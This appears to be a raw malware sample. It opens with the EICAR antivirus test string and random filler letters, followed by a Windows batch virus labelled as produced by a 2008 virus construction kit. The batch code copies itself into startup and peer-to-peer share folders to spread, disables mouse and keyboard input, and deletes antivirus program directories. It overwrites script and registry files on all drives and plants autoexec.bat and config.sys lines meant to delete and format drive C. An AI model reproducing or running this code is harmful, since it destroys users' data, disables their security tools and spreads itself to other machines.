X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ntobprjbfegpmaycpcwconrjpcenlwftdbduxgihlrbgizouszighyugmvxnxcpjdlsvoavzovdidifsliqeuenjxdgzgxnlys
xflidryldxujakeykzapdgitvxlngpyqkymkiwzgsyfkdihpirwkslcmiiihvgozwconodccnohstcfczhfylkrckivlmzeoxq
qabztsgrxnzfjecvzlltlkrwvgjjfcgrpcxygxnkaeafdrhicfxzvewbhbpwblmeidhobkauoxzpyhgwknaqedowbbjadihfti
jjpbjuibcyexpkxrwfzemicqukwojutzhwfqfmivktgfaakxqhozfnhzcnqyhzgkfqkxhxkoeopbdtxomjjjmknkjxweutevhe
mqdbnnnxoerpgwpzvdxcsfubydmekpraxpnanaphpjeqidbriadotrnphnahwyorbqbtjgnhckkvcqcygwvvpbsyheccldbsil
jiypnklczglqwkajrzcqosjvirbnirewdudhsecfnyhllmbkiaftdkyijzpinazrbewpgekntxnicttrkzuprnjkxczwwjeqsm
auhvvuhfbpwumaoxunhrdvpbdkkecovtofautvuvumzbsfnuctdholbxxfkbfezzjdonolxwqhpcvzwrppkzcyzphpylyixhht
bosihhmhwmfdgpfjfgefagcueypsfqilslojqeguxthnkqwitqdyvwhdibsfpcimrrngonwbyjmvxtlsdqlyaluxmipnrqfbbw
zvsjfjbxewmawwovmaibliwgrmdjwoblkvutezlwtkslaaetqxitfsoljwphgfuaeclssfgvrhicvmcwjltmzjuicktkfimcsi
hgrjqiifyyennuajfjroqmgyftsdffjkalaquvcafcalqzamjjdoimgfrkpzewpahhqkuxjmunfnnzvoxojqzulbujucoquzsv
::
:: Generated by Batch Virus Construction Kit 0.9 [DvL]-[rRLF]
:: Created by ~vice~ on 01-31-2008 at 17:52:44
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\wbykhxzd.bat>nul
echo.on error resume next>%windir%\wbykhxzd.vbs
echo.set kw=CreateObject("wscript.shell")>>%windir%\wbykhxzd.vbs
echo.set dz=wscript.createobject("scripting.filesystemobject")>>%windir%\wbykhxzd.vbs
echo.set by=wscript.createobject("wscript.shell")>>%windir%\wbykhxzd.vbs
echo.kw=by.SpecialFolders("Startup")>>%windir%\wbykhxzd.vbs
echo.xh=by.SpecialFolders("AllUsersStartup")>>%windir%\wbykhxzd.vbs
echo.dz.copyfile "%windir%\wbykhxzd.bat", kw & "\wbykhxzd.bat">>%windir%\wbykhxzd.vbs
echo.dz.copyfile "%windir%\wbykhxzd.bat", xh & "\wbykhxzd.bat">>%windir%\wbykhxzd.vbs
copy %0 %windir%\startm~1\progra~1\autost~1\wbykhxzd.bat>nul
copy %0 %windir%\startm~1\progra~1\opstar~1\wbykhxzd.bat>nul
copy %0 %windir%\startm~1\programs\startup\wbykhxzd.bat>nul
copy %0 %windir%\alluse~1\startm~1\programs\startup\wbykhxzd.bat>nul
copy %0 %windir%\alluse~1\menuin~1\progra~1\iniciar\wbykhxzd.bat>nul
copy %0 %windir%\menúin~1\progra~1\inicio\wbykhxzd.bat>nul
copy %0 %windir%\menudé~1\progra~1\démarr~1\wbykhxzd.bat>nul
rundll32 mouse,disable
rundll32 keyboard,disable
set yxb=deltree/y c:\
%yxb%antiba*>nul
%yxb%antivi*>nul
%yxb%av*>nul
%yxb%bitdef*>nul
%yxb%comman~1\>nul
%yxb%cleanc*>nul
%yxb%esafen\>nul
%yxb%findvi*>nul
%yxb%f-*>nul
%yxb%fwin*>nul
%yxb%inocul*>nul
%yxb%kasper*>nul
%yxb%mcafee*>nul
%yxb%msav\>nul
%yxb%norman\>nul
%yxb%norton*>nul
%yxb%pav\>nul
%yxb%pccill*>nul
%yxb%pc-cil*>nul
%yxb%rav\>nul
%yxb%softwin\>nul
%yxb%tbav*>nul
%yxb%toolkit\>nul
%yxb%trendm~1\>nul
%yxb%trex\>nul
%yxb%virus*>nul
%yxb%vpc\>nul
%yxb%vs95\>nul
%yxb%zonela*>nul
set yxb=deltree/y c:\progra~1\
%yxb%antiba*>nul
%yxb%antivi*>nul
%yxb%avg*>nul
%yxb%bitdef*>nul
%yxb%comman~1\>nul
%yxb%common~1\avp*>nul
%yxb%common~1\syman*>nul
%yxb%datafe*>nul
%yxb%deerfi*>nul
%yxb%f-*>nul
%yxb%findvi~1\>nul
%yxb%fsi\>nul
%yxb%fwin*>nul
%yxb%grisoft\>nul
%yxb%inocul*>nul
%yxb%kasper*>nul
%yxb%mcafee*>nul
%yxb%mindso~1\>nul
%yxb%norman\>nul
%yxb%norton*>nul
%yxb%pandas~1\>nul
%yxb%protec*>nul
%yxb%quickh~1\>nul
%yxb%rav\>nul
%yxb%signal9\>nul
%yxb%softwin\>nul
%yxb%spysto~1\>nul
%yxb%syman*>nul
%yxb%tbav\>nul
%yxb%tinype~1\>nul
%yxb%trend*>nul
%yxb%trojan*>nul
%yxb%virus*>nul
%yxb%zonela*>nul
set yxb=
copy %0 c:\download\none>nul
copy %0 c:\downlo~1\none>nul
copy %0 c:\eigene~1\none>nul
copy %0 c:\kazaa\myshar~1\none>nul
copy %0 c:\mesdoc~1\none>nul
copy %0 c:\meusdo~1\none>nul
copy %0 c:\mydocu~1\mymusi~1\none>nul
copy %0 c:\mydocu~1\none>nul
copy %0 c:\mydown~1\none>nul
copy %0 c:\mymusi~1\none>nul
copy %0 c:\mymusic\none>nul
copy %0 c:\progra~1\applej~1\incoming\none>nul
copy %0 c:\progra~1\bearsh~1\shared\none>nul
copy %0 c:\progra~1\edonke~1\incoming\none>nul
copy %0 c:\progra~1\emule\incoming\none>nul
copy %0 c:\progra~1\gnucleus\downlo~1\incoming\none>nul
copy %0 c:\progra~1\gnucleus\downlo~1\none>nul
copy %0 c:\progra~1\grokster\mygrok~1\none>nul
copy %0 c:\progra~1\icq\shared~1\none>nul
copy %0 c:\progra~1\kazaa\myshar~1\none>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\none>nul
copy %0 c:\progra~1\kmd\myshar~1\none>nul
copy %0 c:\progra~1\limewire\shared\none>nul
copy %0 c:\progra~1\morpheus\myshar~1\none>nul
copy %0 c:\progra~1\overnet\bundles\none>nul
copy %0 c:\progra~1\shareaza\downlo~1\none>nul
echo.t=wscript.createobject("wscript.shell");>%windir%\wbykhxzd.js
echo.t.Run("%windir%\wbykhxzd.bat");>>%windir%\wbykhxzd.js
for %%k in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%k
for %%k in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\wbykhxzd.js %%k /y
for %%k in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%k:\nul copy %windir%\wbykhxzd.js %%k:\wbykhxzd.js /y
echo.REGEDIT4>%windir%\ly.reg
echo.>>%windir%\ly.reg
echo.[HKEY_LOCAL_MACHINE]>>%windir%\ly.reg
echo.""="%windir%\wbykhxzd.bat">>%windir%\ly.reg
for %%l in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%l
for %%l in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\ly.reg %%l /y
for %%l in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%l:\nul copy %windir%\ly.reg %%l:\wbykhxzd.reg /y
echo.SHELL "%windir%\wbykhxzd.bat">%windir%\ec.bas
echo.END>>%windir%\ec.bas
for %%e in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%e
for %%e in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\ec.bas %%e /y
for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\ec.bas %%e:\wbykhxzd.bas /y
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>>c:\config.sys
echo.menuitem=kr>>c:\config.sys
echo.>>c:\config.sys
echo.[kr]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
set Á×–ˆŽ¸=md %windir%\desktop\
%Á×–ˆŽ¸%Á×–ˆŽ¸00>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸01>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸02>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸03>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸04>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸05>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸06>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸07>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸08>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸09>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸10>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸11>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸12>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸13>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸14>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸15>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸16>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸17>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸18>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸19>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸20>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸21>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸22>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸23>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸24>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸25>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸26>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸27>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸28>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸29>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸30>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸31>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸32>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸33>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸34>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸35>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸36>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸37>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸38>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸39>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸40>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸41>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸42>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸43>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸44>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸45>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸46>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸47>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸48>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸49>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸50>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸51>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸52>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸53>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸54>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸55>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸56>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸57>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸58>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸59>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸60>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸61>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸62>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸63>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸64>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸65>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸66>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸67>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸68>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸69>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸70>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸71>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸72>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸73>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸74>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸75>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸76>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸77>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸78>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸79>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸80>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸81>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸82>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸83>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸84>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸85>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸86>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸87>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸88>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸89>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸90>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸91>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸92>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸93>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸94>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸95>nul
%Á×–ˆŽ¸%Á×–ˆŽ¸96>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸97>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸98>nul | %Á×–ˆŽ¸%Á×–ˆŽ¸99>nul
set Á×–ˆŽ¸=
cscript %windir%\wbykhxzd.vbs
rundll32 shell32,shexitwindowsex 4
cls
